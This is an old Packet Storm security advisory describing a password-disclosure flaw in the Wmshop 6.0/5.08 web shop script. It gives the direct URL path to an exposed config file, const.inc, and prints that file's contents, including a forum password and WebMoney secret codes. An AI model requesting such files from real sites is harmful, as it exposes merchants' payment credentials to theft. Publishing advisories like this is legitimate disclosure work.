Wmshop 6.0 Password Disclosure

2009-07-23T00:00:00
ID PACKETSTORM:79549
Type packetstorm
Reporter Septemb0x
Modified 2009-07-23T00:00:00

Description

                                        
                                            `  
< ------------------- header data start ------------------- >  
### Cyber-Warrior & Security TIM - Bug Researchers Group ###  
  
# Application Name : Wmshop 6.0 - 5.08  
  
# Vulnerable Type : Arbitrary Forum Password Disclosure Vulnerability  
  
# Infection : Forum Password Get...  
  
# Author : Septemb0x  
  
# Script Down.& WebSite : http://s2.dosya.tc/wmshop_6.0.rar.html - http://s2.dosya.tc/wmshop_5.08.rar.html - https://merchant.webmoney.ru/conf/purses.asp  
  
### Cyber-Warrior & Security TIM - Bug Researchers Group ###  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
EXPLOIT :  
http://[target]/[path]/const.inc  
  
GET TO;  
<?  
$serv_const_name="shop";  
$serv_const_embox="support@shop.ru";  
$serv_const_forum_pass="Gdssn6Fdgh";  
$serv_const_title="Òîðãîâàÿ ïëîùàäêà ïî ïðîäàæå öèôðîâûõ òîâàðîâ";  
$serv_const_servname="localhost";  
$serv_const_commission="0.05";  
$serv_const_lstcount="25";  
$serv_const_lstrekom="20";  
$serv_const_shopwmz="Z65656565665";  
$serv_const_shopwmid="645634564556";  
$serv_const_secretcod_wmid="gFdGdx2d5FGmJt5DevALJg6";  
?>  
  
< -- bug code end of -- >  
  
# Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends...  
_________________________________________________________________  
Windows Live ile fotoðraflarýnýzý organize edebilir, düzenleyebilir ve paylaþabilirsiniz.  
http://www.microsoft.com/turkiye/windows/windowslive/products/photo-gallery-edit.aspx`